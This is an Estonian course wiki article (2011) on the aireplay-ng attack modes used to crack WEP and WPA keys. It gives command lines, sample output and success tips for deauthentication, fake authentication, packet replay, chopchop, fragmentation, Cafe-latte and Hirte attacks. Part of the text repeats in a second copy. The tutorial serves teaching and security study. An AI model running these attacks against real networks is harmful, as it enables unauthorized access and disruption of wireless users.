* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
21:40:20 Sending Authentication Request
21:40:20 Authentication successful
21:40:20 Sending Association Request
21:40:20 Association successful :-)
...
</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>...
15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0
Read 4 packets...

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 de00 0014 6c7e 4080 000f b534 3030 .A....l~@....400
0x0010: ffff ffff ffff 4045 d16a c800 6f4f ddef ......@E.j..oO..
0x0020: b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162 ...|.*d....c..Ab
0x0030: 8ad9 2f74 16bb abcf 232e 97ee 5e45 754d ../t....#...^EuM
0x0040: 23e0 883e #..>

Use this packet ? y
</pre>

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0
Read 10 packets...

Size: 124, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = BB:BB:BB:BB:BB:BB
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 2c00 0014 6c7e 4080 000f b534 3030 .A,...l~@....400
0x0010: 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7 .@.w....=y...Y+.
0x0020: 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc ..........O...;.
0x0030: 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7 ..........X...{.
0x0040: 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d ..i...;.Cj..v,..
0x0050: 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913 zW?=.<.....emf..
0x0060: 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825 ....o..h+ U...%
0x0070: bf22 960a 5c7b 3036 290a 89d6 ."..\{06)...

Use this packet ? y
</pre>

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>$ sudo aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0
...
</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

<pre>
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
Saving ARP requests in replay_arp-0001-123456.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets...
</pre>

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre>$ sudo aireplay-ng -4 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA ath0
Read 165 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F

Use this packet ? y

Saving chosen packet in replay_src-0001-123456.cap

Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 760ms
Offset 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 498ms
Offset 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 645ms
Offset 82 ( 5% done) | xor = 07 | pt = 4D | 161 frames written in 483ms
Offset 81 ( 7% done) | xor = EB | pt = 00 | 12 frames written in 36ms
...
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0001-123457.cap
Saving keystream in replay_dec-0001-123456.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugemiseks paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
$ sudo aireplay-ng -5 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
Waiting for a data packet...
Read 96 packets...

Size: 120, FromDS: 1, ToDS: 0 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = CC:CC:CC:CC:CC:CC
Source MAC = BB:BB:BB:BB:BB:BB

0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.
0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q.D...w.....<R.
0x0070: 0505 933f af2f 740e ...?./t.

Use this packet ? y
Saving chosen packet in replay_src-0001-123456.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0001-123456.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

<pre>
$ sudo aireplay-ng -6 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA -D mon0
...
</pre>

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

===Kasutamine===
<pre>$ sudo aireplay-ng -7 -h CC:CC:CC:CC:CC:CC -D mon0
...
</pre>

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T19:25:00Z

Tliiv: /* Rünnak 6: Cafe-latte attack */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
